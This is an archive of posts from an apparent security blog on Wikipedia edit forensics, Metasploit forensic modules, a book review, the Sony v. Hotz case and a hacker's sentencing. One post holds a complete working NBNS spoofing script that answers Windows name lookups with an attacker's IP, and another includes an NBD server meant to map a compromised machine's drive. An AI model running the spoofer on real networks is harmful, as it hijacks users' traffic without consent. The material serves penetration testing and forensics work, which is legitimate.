Wikipedia articles carry with them a revision history that logs every change made to an article, along with the username or IP address that made each change. For someone gathering intelligence, the revision history and user information can say as much about a topic as the article itself, or more. Many Wikipedia editors are personally connected to the articles they edit, or otherwise have a stake in what is being said, and by processing the revision data it’s possible to gain some insight into those connections.

This is somewhat awkward and time-consuming to do through the web interface, so it helps to automate. I had a need to determine which revisions and users introduced certain phrases in an article, and wrote the following script to help:

To use, first export the article(s) you want to process to XML using Wikipedia’s Special:Export page (be sure to uncheck “Include only the current revision”). Once you have the XML saved locally, usage is as follows:

./wikiadded.py <xml file> <word or phrase>

The output is comma-delimited and contains the Wikipedia timestamp, user information (username/id or IP address), and a link to the revision that introduced (or re-introduced) the phrase.
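The script itself is not reproduced on this page, so here is an added example that does the same job (it is not the author’s wikiadded.py). It assumes the MediaWiki export XML layout that Special:Export produces (page/revision/id/timestamp/contributor/text) and that a revision can be linked as https://en.wikipedia.org/w/index.php?oldid=<id>; the embedded sample dump is constructed for illustration.

```python
#!/usr/bin/env python3
"""Report the revisions of a Special:Export dump that introduced a phrase.

Added example, not the original wikiadded.py. Assumes the MediaWiki export
format (<page>/<revision>/<id>/<timestamp>/<contributor>/<text>).
"""
import csv
import sys
import xml.etree.ElementTree as ET

OLDID_URL = "https://en.wikipedia.org/w/index.php?oldid={}"   # assumed permalink form

# Constructed sample dump: the phrase appears in rev 102, is removed in 103
# and re-introduced in 104, so the script should report 102 and 104.
SAMPLE_XML = b"""<mediawiki xmlns="http://www.mediawiki.org/xml/export-0.10/" xml:lang="en">
  <page>
    <title>Example article</title>
    <revision><id>101</id><timestamp>2011-06-01T10:00:00Z</timestamp>
      <contributor><username>Alice</username><id>42</id></contributor>
      <text xml:space="preserve">The key looks like a key.</text></revision>
    <revision><id>102</id><timestamp>2011-06-02T10:00:00Z</timestamp>
      <contributor><ip>192.0.2.7</ip></contributor>
      <text xml:space="preserve">The bit of the key looks like an RJ-45 port.</text></revision>
    <revision><id>103</id><timestamp>2011-06-03T10:00:00Z</timestamp>
      <contributor><username>Alice</username><id>42</id></contributor>
      <text xml:space="preserve">The key looks like a key again.</text></revision>
    <revision><id>104</id><timestamp>2011-06-04T10:00:00Z</timestamp>
      <contributor><username>Alice</username><id>42</id></contributor>
      <text xml:space="preserve">Restored: it looks like an RJ-45 port.</text></revision>
  </page>
</mediawiki>
"""


def _local(tag):
    """Strip the export namespace, e.g. '{http://www.mediawiki.org/xml/export-0.10/}text'."""
    return tag.rsplit("}", 1)[-1]


def _child(elem, name):
    for child in elem:
        if _local(child.tag) == name:
            return child
    return None


def _text(elem, name, default=""):
    child = _child(elem, name)
    return (child.text or default) if child is not None else default


def contributor_of(rev):
    """'username (id)' for logged-in editors, the bare IP for anonymous ones."""
    contrib = _child(rev, "contributor")
    if contrib is None:
        return "deleted"
    ip = _text(contrib, "ip").strip()
    if ip:
        return ip
    username = _text(contrib, "username").strip()
    return "%s (%s)" % (username, _text(contrib, "id").strip()) if username else "deleted"


def find_introductions(xml_bytes, phrase, case_sensitive=False):
    """Return (title, timestamp, contributor, revid, url) for each revision in
    which `phrase` is present but was absent from the preceding revision, i.e.
    every introduction or re-introduction of the phrase."""
    needle = phrase if case_sensitive else phrase.lower()
    hits = []
    for page in ET.fromstring(xml_bytes):
        if _local(page.tag) != "page":
            continue
        title = _text(page, "title").strip()
        revs = [r for r in page if _local(r.tag) == "revision"]
        revs.sort(key=lambda r: _text(r, "timestamp"))   # ISO 8601 sorts lexically
        present_before = False
        for rev in revs:
            body = _text(rev, "text")
            present_now = needle in (body if case_sensitive else body.lower())
            if present_now and not present_before:
                revid = _text(rev, "id").strip()
                hits.append((title, _text(rev, "timestamp").strip(),
                             contributor_of(rev), revid, OLDID_URL.format(revid)))
            present_before = present_now
    return hits


def main(argv):
    if len(argv) != 3:
        sys.exit("usage: %s <xml file> <word or phrase>" % argv[0])
    with open(argv[1], "rb") as fh:
        rows = find_introductions(fh.read(), argv[2])
    writer = csv.writer(sys.stdout)
    writer.writerow(["title", "timestamp", "contributor", "revid", "url"])
    writer.writerows(rows)


if __name__ == "__main__":
    main(sys.argv)
```

Revisions are sorted by timestamp before scanning so the result does not depend on the order the export happens to list them in, and a phrase that is removed and later restored is reported once per re-introduction, which is exactly the edit-war pattern worth looking at.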

Hope this is of use to someone besides myself!

 

Today, while updating this VPS, I took the opportunity to change the style/design of mcgrewsecurity.com. I’m especially proud of the new logo. It’s a combination of several out-of-copyright book scans, and my co-worker Kendall’s keen observation that the bit of the key looked like an RJ-45 Ethernet port. A bit of work later and now it very much looks like one.

Over the past several months, No Starch Press has been kind enough to send along review copies of several of their recent security-related book releases. Soon you’ll start seeing my reviews being posted. Overall, I can say I’m very impressed.

 

I apologize to those in my talk (and throughout the rest of the cons last week) who asked about availability of the tools I describe in my talk. I stated that they should’ve been in the Metasploit trunk on the day of my Black Hat USA talk this past Wednesday, backed by assurances from Rapid7 that it would be there. Apparently I was talking to someone at Rapid7 who was unable to make those assurances, so it looks like I’ll be starting over the process of getting it available in the main distribution today. Edit: It’s in now. If you svn update metasploit, enum_drives and imager will be in “modules/post/windows/gather” and nbd_server will be in “modules/post/windows/manage”.

In the meantime, you can drop the following files into your own copy of Metasploit to use the tools introduced in my talk today:

  • enum_drives.rb – Enumerates physical disks and logical volumes for use in the other two modules
  • imager.rb – Images physical/logical drives over a meterpreter shell. Options are similar to those that forensics folk use in dd
  • nbd_server.rb – Maps a remote physical/logical drive to a local network block device server.  You can then mount and/or use any forensics tools you’d like on it.

Also, here are the final slides as I presented them, and the whitepaper that I originally submitted with my talk proposal:

Video of both the Black Hat USA and DefCon versions of the talk will be available at some point.

 

This is just a quick post to remind readers that I will be in Vegas for Black Hat and DEFCON this week, and I’m looking forward to meeting as many of you as possible. I will be giving a talk at both Black Hat and DEFCON:

  • Wednesday, August 3rd, 3:15 PM – Black Hat USA 2011 – Track 7
  • Friday, August 5th, 3:00 PM – DEFCON 19 – Track 2

My talk is entitled “Covert Post-Exploitation Forensics With Metasploit”, and I’ll be talking about a set of Metasploit post-modules that I have developed for performing forensic analysis of machines over a meterpreter connection. With these modules, penetration testers (as well as people in other roles) will be able to run currently available, popular forensic tools on remote drives in the same way that forensic examiners currently use them on local drives. Through some protocol trickery and using Railgun to pipe the Windows API over meterpreter, you can essentially make a local block device that maps to the victim’s drive. I’ll have some discussion, including a basic introduction to disk/file-system forensics for penetration testers, a demo, and some time for questions and discussion.
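To make the “local block device that maps to the victim’s drive” idea concrete, here is an added example that is not the author’s nbd_server.rb: the server half of the classic NBD protocol in Python, serving a constructed in-memory image where the real module would issue its reads over meterpreter/Railgun. It uses the oldstyle fixed 152-byte negotiation (an assumption; the post does not say which handshake the module speaks) and refuses writes so the remote evidence is never altered.

```python
#!/usr/bin/env python3
"""Minimal read-only NBD server (oldstyle negotiation) over an in-memory image.

Added example, not the nbd_server.rb module from the talk. ImageBackend stands
in for the remote drive; the real module satisfies each read by calling the
Windows API over meterpreter/Railgun instead.
"""
import socket
import struct
import sys

NBD_INIT_PASSWD = b"NBDMAGIC"
NBD_CLISERV_MAGIC = 0x00420281861253
NBD_REQUEST_MAGIC = 0x25609513
NBD_REPLY_MAGIC = 0x67446698
NBD_CMD_READ, NBD_CMD_WRITE, NBD_CMD_DISC = 0, 1, 2
NBD_FLAG_HAS_FLAGS, NBD_FLAG_READ_ONLY = 1, 2
EPERM, EINVAL = 1, 22                 # errno values carried in the reply's error field
REQUEST_LEN = 28                      # magic, type, handle, offset, length

# Constructed stand-in for a drive image: 4096 bytes of a repeating pattern.
SAMPLE_IMAGE = bytes(range(256)) * 16


class ImageBackend:
    # In the real module this is where the calls made over Railgun (open
    # \\.\PhysicalDriveN, seek, ReadFile) would satisfy each request.
    def __init__(self, data):
        self.data = data

    @property
    def size(self):
        return len(self.data)

    def read(self, offset, length):
        return self.data[offset:offset + length]


def build_oldstyle_handshake(export_size, read_only=True):
    """152-byte oldstyle greeting: password, magic, export size, flags, 124 zero bytes."""
    flags = NBD_FLAG_HAS_FLAGS | (NBD_FLAG_READ_ONLY if read_only else 0)
    return NBD_INIT_PASSWD + struct.pack(">QQI", NBD_CLISERV_MAGIC, export_size, flags) + b"\x00" * 124


def build_request(cmd, handle, offset, length):
    return struct.pack(">IIQQI", NBD_REQUEST_MAGIC, cmd, handle, offset, length)


def parse_request(buf):
    magic, cmd, handle, offset, length = struct.unpack(">IIQQI", buf)
    if magic != NBD_REQUEST_MAGIC:
        raise ValueError("bad NBD request magic: %#x" % magic)
    return cmd & 0xFFFF, handle, offset, length   # upper 16 bits are command flags


def build_reply(handle, error=0, data=b""):
    return struct.pack(">IIQ", NBD_REPLY_MAGIC, error, handle) + data


def handle_request(backend, cmd, handle, offset, length):
    """Return (reply_bytes, keep_serving). Writes are refused (EPERM) so the
    evidence drive is never modified; out-of-range reads get EINVAL."""
    if cmd == NBD_CMD_DISC:
        return b"", False
    if cmd == NBD_CMD_READ:
        if offset + length > backend.size:
            return build_reply(handle, EINVAL), True
        return build_reply(handle, 0, backend.read(offset, length)), True
    if cmd == NBD_CMD_WRITE:
        return build_reply(handle, EPERM), True
    return build_reply(handle, EINVAL), True


def recv_exact(conn, n):
    buf = b""
    while len(buf) < n:
        chunk = conn.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("client closed the connection mid-request")
        buf += chunk
    return buf


def serve(conn, backend):
    conn.sendall(build_oldstyle_handshake(backend.size))
    while True:
        cmd, handle, offset, length = parse_request(recv_exact(conn, REQUEST_LEN))
        if cmd == NBD_CMD_WRITE:
            recv_exact(conn, length)          # drain the payload we are about to refuse
        reply, keep_serving = handle_request(backend, cmd, handle, offset, length)
        if not keep_serving:
            break
        conn.sendall(reply)


def main(port=10809):
    backend = ImageBackend(SAMPLE_IMAGE)
    with socket.create_server(("127.0.0.1", port)) as srv:
        print("serving %d-byte image on 127.0.0.1:%d" % (backend.size, port))
        conn, _ = srv.accept()
        with conn:
            serve(conn, backend)


if __name__ == "__main__":
    main(int(sys.argv[1]) if len(sys.argv) > 1 else 10809)
```

Point an nbd-client that still speaks the oldstyle handshake at it (`nbd-client 127.0.0.1 10809 /dev/nbd0`) and `/dev/nbd0` can be handed to mmls, fls or any other Sleuth Kit tool exactly as a local image would; swapping the backend’s read() for reads issued over a meterpreter session is the whole trick the talk describes.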

The presentation and tools will be available on the conference disc, and the latest versions will be posted here as soon as I can manage it after my talk. The modules ought to be available in the Metasploit SVN soon as well.

I’ll also be actively attending/prowling around the conference, so feel free to track me down to talk shop about breaking things, forensics, etc. I have lots of fun stories that aren’t appropriate for the blog/twitter.

Edit:

I will also be bringing 20 of the challenge coins we normally hand out at the end of the Advanced Forensics class at the Mississippi State University National Forensics Training Center. If you want one, track me down at Black Hat or DEFCON and offer me something cool/interesting for one ;) :

Double Secret Edit:

I also have fun 0-day for Tiny Tower on all IOS devices (iPhone, iPad, iPod Touch), which I will disclose to attendees for the price of one drink and a handshake Non-Disclosure Agreement (negotiable). You’re not going to be hacking the Gibson with this one anytime soon, but it’s *fun*.

 

I’ve put off doing this review for too long.  I was sent this book close to its release date, and made quick work of reading through it and making notes for the review. As you’ll see in this post, I don’t think much of it, and I wasn’t looking forward to making such a negative post about it. I would just let it slide, as I prefer to post reviews of books that I like and recommend at least to some extent, but Packt Publishing are heavily promoting this book and I’ve seen several people I know purchase or consider purchasing it. For that reason, I feel like it’s a good idea to warn the target audience of this blog away from it.

At a first glance, it’s easy to be skeptical of this book due to the fact that it had the misfortune of being a Backtrack 4 book published at almost the exact time Backtrack 5 came out. This doesn’t bother me so much. If it were written well, it could easily make up for any differences in the details between versions. Unfortunately, being dated is the least of this book’s problems.

The vast majority of the book is padded with a grocery list of what appears to be each and every tool in the Backtrack distribution. Comprehensive coverage is fine, but each tool is given only the very briefest of treatments, with almost no attention paid to educating the reader on how the tools work or the background needed to use them effectively. New terms and concepts are thrown at the reader relentlessly without introduction or explanation. This book falls into a useless “middle” state where a beginning user would be better served by a book that gives more depth of coverage for a handful of tools (see Web Application Hacker’s Handbook), while it still fails to serve an advanced user who could find the same information quickly in a man page. The book falls well short of its goal of serving as a “single professional, practical, and expert guide to develop hardcore penetration testing skills from scratch”.

There are many instances of wasted space in the book as well. A straight copy-paste of /etc/services is the worst offender. The text doesn’t exactly live up to the promises of its table of contents either. A segment on “Writing exploit modules” simply takes the reader through the source code of an existing metasploit module, with only the barest of commentary that makes one wonder if the authors understand how it works, much less whether or not the reader will be able to write one (or even read one) in practice.

Aside from the “list of things” approach that takes up the majority of the book, there is a fair amount of text about the penetration testing process that, if executed properly, would make an excellent introduction to newcomers. Unfortunately, it’s written as though the authors intentionally wanted it to be impenetrable and difficult to understand. The following sentence is a representative example:

Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment.

Some of it is just plain wrong. A set of paragraphs equates “black hat” hacking with “black box” testing, and goes on to state the same about “white” and “grey”. It’s difficult to imagine that anyone in penetration testing believes that. The authors take the reader through overwrought descriptions of various testing “methodologies” (the OWASP Top Ten is not a methodology), and then throw them out in favor of an over-simplified “Backtrack Testing Methodology” that appears to be a simple depth-first traversal of the BT4 menu options.

While it may be tempting to buy this book as a quick reference or summary of all of the tools, I would not encourage it. I would strongly discourage anyone thinking to start out, or get up to speed in penetration testing from buying this book. It’ll just frustrate you. For more experienced readers, there are books that are far more worthy of your time and money.

 

Just a quick note to readers in security roles that might be responsible for end-user actions: Tonight’s announcement that Osama Bin Laden has been killed will likely spawn a wave of malware purporting to be videos or pictures of the body or the operation. You may want to pre-empt this by reminding users of the dangers of clicking on and running things from untrusted sources.

I think most of the readers of this blog are smart enough not to fall for this themselves (and might even seek it out for the malware samples!), and that a good percentage are in offensive security roles, but this could be a big problem for the readers in defensive roles. So, heads up!

 

The reviewers at Black Hat have notified me that my submission has been accepted and I will be speaking at BlackHat USA 2011 in Las Vegas this year. As you can imagine, I’m thrilled, as I was not able to attend BlackHat or Defcon last year. I’m looking forward to being there as a speaker this time, interacting with all the great folks I met two years ago there, and anyone new I meet.

The title of my talk is “Covert Post-Exploitation Forensics With Metasploit”, which will be accompanied by the release of a set of meterpreter scripts and a white-paper that details how they can be used. The abstract of my work has been posted on the Briefings page at the USA 2011 site:

In digital forensics, most examinations take place after the hardware has been physically seized (in most law enforcement scenarios) or a preinstalled agent allows access (in the case of enterprise forensics packages). These scenarios imply that the “subject” (the one in possession of the media) is aware of the fact that their data has been seized or subject to remote access. While penetration testing tools allow for surface-level access to the target filesystem, there is a lot of potential data that is being missed in unallocated space that could be accessed by file system forensic tools such as The Sleuth Kit.

 

In this presentation, Wesley will present a new set of tools that will allow forensic examiners and pentesters alike to image remote filesystems of compromised systems, or perform examinations directly on remote filesystems with forensic tools on the attacking machine by mapping remote drives to local block devices. This is the integration of Metasploit with a large body of existing digital forensic tools.

The associated scripts and more information will be released with the conference proceedings, and here on this site at the time of my talk (probably also a coordinated release into the Metasploit trunk, but I haven’t talked to those guys about it yet).

At this point, you’ll have to take my word for it, but I assure you this isn’t a typical “Yet Another Metasploit Talk”. I would hope that the submission reviewers at Black Hat would not have accepted it if they felt this was the case. What I’m demonstrating is a way to use a whole suite of useful and mature tools in a penetration test (or other scenario) through Metasploit.

Assuming I’m not scheduled to present at the same time as Barnaby Jack, Dan Kaminsky, or the like, I’d definitely recommend showing up, as I think it’ll be a very fun talk and demonstration. See you at Caesars Palace!

 

Tim Medin, over at the excellent Packetstan blog, just wrote up a detailed post on the implementation of an NBNS spoofing module which has been added to the latest Metasploit trunk:

This module is based on an old tool, nbnspoof.py, that I wrote to perform this attack, originally described (as nearly as I can tell) by Sumit Siddharth. It’s a very simple attack, taking advantage of the way Windows falls back to NetBIOS Name Service (NBNS) lookups once local and DNS lookups fail. If you’ve ever turned a careful eye to broadcast traffic on any network with Windows systems, you’ve probably noticed that a surprising number of lookups fall through to NBNS for various reasons.
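As an added example (not the original nbnspoof.py and not the Metasploit module), here is the attack in Python: parse the broadcast NAME QUERY REQUEST a Windows host sends once its other lookups have failed, and answer with a POSITIVE NAME QUERY RESPONSE claiming the name for an IP we control. Packet layout follows RFC 1002; the 0x8500 response flags and 165-second TTL are conventional responder values and are assumptions here, not something the post states.

```python
#!/usr/bin/env python3
"""NBNS name-query spoofer: answer NetBIOS name queries with our own IP.

Added example, not the original nbnspoof.py or the Metasploit module.
"""
import re
import socket
import struct
import sys

NBNS_PORT = 137
NB_TYPE, IN_CLASS = 0x0020, 0x0001
FLAGS_QUERY_BCAST = 0x0110            # opcode QUERY, RD, B (broadcast) set
FLAGS_POSITIVE_RESPONSE = 0x8500      # R, AA, RD set, RCODE 0 (assumed conventional value)
QUERY_LEN = 50                        # 12-byte header + 34-byte name + type + class


def encode_name(name, suffix=0x00):
    """First-level encoding: 15-char space-padded name plus a suffix byte, each
    nibble written as a letter 'A'..'P', wrapped in a 0x20 length byte and a 0x00."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    letters = bytes(0x41 + n for b in raw for n in ((b >> 4), (b & 0x0F)))
    return b"\x20" + letters + b"\x00"


def decode_name(enc):
    """Inverse of encode_name; returns (name, suffix)."""
    body = enc[1:33]
    raw = bytes(((body[i] - 0x41) << 4) | (body[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(trn_id, name, suffix=0x00):
    """What a Windows host broadcasts after hosts-file and DNS lookups fail."""
    header = struct.pack(">HHHHHH", trn_id, FLAGS_QUERY_BCAST, 1, 0, 0, 0)
    return header + encode_name(name, suffix) + struct.pack(">HH", NB_TYPE, IN_CLASS)


def parse_query(pkt):
    """Return (trn_id, name, suffix) for an NB name query, else None."""
    if len(pkt) < QUERY_LEN:
        return None
    trn_id, flags, qdcount = struct.unpack(">HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:        # a response, or not a one-question query
        return None
    if pkt[12] != 0x20 or pkt[45] != 0x00:    # not a 32-character first-level name
        return None
    if struct.unpack(">HH", pkt[46:50]) != (NB_TYPE, IN_CLASS):
        return None
    name, suffix = decode_name(pkt[12:46])
    return trn_id, name, suffix


def build_response(trn_id, name, suffix, spoof_ip, ttl=165):
    """POSITIVE NAME QUERY RESPONSE claiming `name` lives at spoof_ip."""
    rdata = struct.pack(">H", 0x0000) + socket.inet_aton(spoof_ip)   # NB_FLAGS: unique name, B-node
    answer = encode_name(name, suffix) + struct.pack(">HHIH", NB_TYPE, IN_CLASS, ttl, len(rdata)) + rdata
    return struct.pack(">HHHHHH", trn_id, FLAGS_POSITIVE_RESPONSE, 0, 1, 0, 0) + answer


def spoof_reply(pkt, spoof_ip, name_regex=None):
    """Response to send for a received packet, or None if we should stay quiet."""
    parsed = parse_query(pkt)
    if parsed is None:
        return None
    trn_id, name, suffix = parsed
    if name_regex is not None and not re.search(name_regex, name):
        return None
    return build_response(trn_id, name, suffix, spoof_ip)


def main(spoof_ip, name_regex=None):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("0.0.0.0", NBNS_PORT))      # needs root; queries are broadcast to UDP 137
    while True:
        pkt, (src_ip, src_port) = sock.recvfrom(1024)
        reply = spoof_reply(pkt, spoof_ip, name_regex)
        if reply is not None:
            sock.sendto(reply, (src_ip, src_port))
            print("answered %s for %r" % (src_ip, parse_query(pkt)[1]))


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: %s <ip to hand out> [name regex]" % sys.argv[0])
    main(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
```

The optional regex matters on an engagement: answering every failed lookup on a busy segment is noisy and will break things for users, whereas claiming only the names you care about (a mistyped file server, say) keeps the blast radius small. The responder also ignores anything with the response bit set, so two spoofers on one segment will not answer each other.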

Tim does a great job of describing how the spoofing works, how to use it in the context of a penetration test, and how the module was developed. Due to its integration into the current version of the Metasploit framework, I’d have to say that I recommend it over the original python version. Maybe one day soon I’ll one-up him and try to turn it into a meterpreter post-exploitation script, in order to hijack remote hosts into being spoofers ;-) .

Until then, and in related news, I’ve submitted a talk on some other forms of Metasploit sorcery that I have developed recently to Defcon (and tomorrow to Blackhat once the CFP opens). With any luck I’ll be speaking at one or the other later this year. Either way, I’ll see some of my readers there, hopefully!

 

EDIT: I have found some clarification about the “controller cards”, seemingly confirming what I have posted, and have added thoughts to the end of this post

Today, on the Wired Threat Level blog, there is a story that covers Sony’s allegations that George Hotz (“geohot”), who they are suing for DMCA violations involving a PlayStation 3 jailbreak, sabotaged hard drives provided for discovery, and skipped town.

Skipping town to South America is not in my area of expertise, so I’m not commenting on whether or not that is happening, but forensic acquisition and analysis of hard drives happens to be my current bread-and-butter. The Wired article states that, regarding the hard drives, Sony claims that Hotz provided the hard drives in a non-functional state. This includes a link to a PDF from the case’s filings which includes the exact wording of Sony’s complaint on page 22:

Despite Judge Spero’s orders, Hotz continues to frustrate all attempts to complete jurisdictional discovery.  In yet another attempt to avoid his deposition and a limited inspection of his impounded hard drives, on March 17, 2011, Hotz filed a motion for protective order on issues already decided by Judge Spero.  (Docket No. 100.)  On the same day, TIG discovered that prior to delivery, Hotz had removed integral components from his impounded hard drives, rendering them completely non-functional.  Bricker Decl., ¶21, Exh. S.  When SCEA echoed TIG’s request that the components of the hard drives be delivered immediately, Hotz’s counsel responded that Hotz was in South America.

Hotz’s attorney’s quote to Wired in response to this was the following:

They didn’t have the controller card attached. That’s it

The attorney, I assume, does not have an extensive technical background, and likely gave this comment off the cuff (or as “off the cuff” as any attorney will allow themselves to be). Therefore, this is going to take some interpretation. The first question is what they mean by “controller card”. When it comes to hard drives, two things come to my mind:

  • The interface between the chipset of the motherboard and the hard drive. For most motherboards the SATA or IDE interface is integrated into the board. If it’s an older computer that an end-user has added a SATA drive to, a SATA “controller card”, in the literal “card” sense, may be slotted into the motherboard to interface with the newer drive.
  • The circuit board attached to the drive that handles ATA communications on one side, and interacts with the drive’s electrical and mechanical internals on the other. To illustrate, it’s the part facing the camera in this image:

The Underside of a Hard Drive

The latter is what I assume is meant, for the following reasons:

  • It’s something that could be removed from a drive, as the filing states
  • Controller cards in the sense of a slotted card on a motherboard aren’t very common right now. Most computers have the interface they need on the motherboard.
  • Even if it was a SATA, IDE, or even SCSI controller card meant to be slotted into a motherboard, not providing this card would not render the drive unreadable to a well-outfitted forensics lab that TIG (the third party forensic examiner Sony is using) would have.

Now, I do not support Sony’s lawsuit against George Hotz, but it seems to me that if he did remove those controller boards from the drives, this is a case of needlessly antagonizing the opposing counsel, examiners, and the judge. I really don’t think it’s a good idea to intentionally do this when providing evidence under a court order.

Those boards don’t just fall off, and the absence of them is not something that is as easy to overcome as Hotz’s attorney implies. To read a drive that has had this board removed, you would need an identical board. Those who do data recovery in cases where this board has been damaged know that extreme care needs to be taken in finding a replacement. Even drives of the same model and capacity can have different revisions of these boards, and it’s crucial to get a match. Even a forensics firm such as TIG is not likely to maintain a stockpile of various controller boards from drives, as it would be prohibitively expensive to buy and file “one of everything”. The absence of the board (not just the failure of it) makes it even more difficult, as it may or may not be possible to determine the right revision of the board to use to replace it, without the original to compare.

While I disagree with the basis of the lawsuit and support the opening of electronic devices (all of my and my spouse’s Apple iPods, iPhones, and iPads are jailbroken), if this is the method being used to stall the plaintiff and case progress, I see that as being in bad form for Hotz, and a bigger issue than his attorney lets on. Hopefully not. Don’t make it hard for me to like you, geohot! Take the high road.

EDIT: I found the exhibit with the discussion of the missing hard drive parts at Groklaw:

This pretty much confirms the above with the following quotes from an examiner at TIG:

This controller card is  installed at the factory and not normally removed or handled by an end user.

We took the drives out of our evidence locker and the evidence bag to image them in their current encrypted state as stated in the order and agreed to on our phone call yesterday.   We have determined that the controller cards which are screwed onto the hard drives were removed prior to them being given to us.   Therefore we are unable to operate the hard drives in their current state.  Keep in mind that we need two days to image these drives as we have to image two 1TB drives.

It’s difficult to imagine a reason Hotz would have had to remove the circuit boards from the drives he was ordered to turn over. It will be very interesting to see why he did this. From my position, I can’t see this as being productive for anything other than antagonizing the opposing party and, more importantly, the judge.

 

Jesse William McGraw, who pleaded guilty to two counts of transmitting malicious code to systems at the hospital at which he worked (including a SCADA HVAC system’s HMI), was sentenced yesterday at the U.S. District Court for Northern Texas to 110 months of custody, followed by three years of supervised release. He has also been ordered to pay restitution in the amount of $31,881.75. This is according to the latest filing on his case on PACER:

He was facing a maximum of 10 years per count, which is higher than the usual 5 years per count due to the threat to public health and safety. At one point in the case last year, he had signed a plea agreement stating that he would plead guilty in exchange for a maximum sentence of 6 years. This fell through, however, when he reneged on the deal by pleading not guilty at his next appearance in court. He was then re-indicted on 14 counts, which were dropped after he agreed to (and did) plead guilty to the original two counts, outside the scope of any agreement.

On a personal note, I feel that this is a fair sentence considering the circumstances. His actions jeopardized the safety of innocent people and attempted to destroy evidence and hinder the investigation after he was taken into custody. Even after he finally pleaded guilty, he continued to blame everyone but himself, as you can see in his “cross-site scripting tunneling” story he posted, or had someone post for him, from prison three months ago.  I originally felt very sorry for him, though it’s hard to have any sympathy for someone that has continually acted against his own best interests as long as he has.

The rest of the “Electronik Tribulation Army” have gone relatively quiet. Maybe this will be a wakeup call for them to get out of this game.

UPDATE: A good post on this from the folks at the Dallas Observer:

If you’re new to the site, these are the previous posts this is a follow-up to:

© 2012 McGrew Security Suffusion theme by Sayontan Sinha